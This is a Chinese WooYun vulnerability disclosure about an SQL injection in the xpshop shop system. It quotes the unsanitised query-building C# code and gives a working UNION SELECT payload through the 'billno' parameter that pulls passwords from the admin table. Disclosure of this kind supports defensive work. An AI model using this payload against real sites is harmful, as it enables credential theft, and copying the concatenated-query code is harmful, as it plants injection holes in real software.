当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146964

漏洞标题:xpshop网店系统sql注入再来一处

相关厂商:xpshop

漏洞作者: 不能忍

提交时间:2015-10-22 17:36

修复时间:2015-12-06 17:38

公开时间:2015-12-06 17:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

应该还有几个就收工了,其实还有一些,不过感觉好累不想弄了。再挖多几个就收工了!

详细说明:

漏洞位置xpshop.webui.IspOrderReturnBy:

protected void Page_Load(object sender, EventArgs e)
		{
			base.Response.AddHeader("Pragma", "No-Cache");
			base.Response.Buffer = true;
			base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
			base.Response.Expires = 0;
			base.Response.CacheControl = "no-cache";
			OrderDB orderDB = new OrderDB();
			int orderID = orderDB.GetOrderID(base.Request["billno"].ToString());
			this.order = orderDB.GetOrderDetails(orderID);


跟进GetOrderID函数:

public int GetOrderID(string orderNo)
		{
			return int.Parse(XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "SELECT OrderID FROM Orders WHERE OrderNo = '" + orderNo + "'", null).ToString());
		}


都是一样没过滤直接进库的。
payload:
/isporderreturnby.aspx?billno=test' union select password from admin--

漏洞证明:

http://localhost/isporderreturnby.aspx?billno=test' union select password from admin--

1.jpg

修复方案:

版权声明:转载请注明来源 不能忍@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝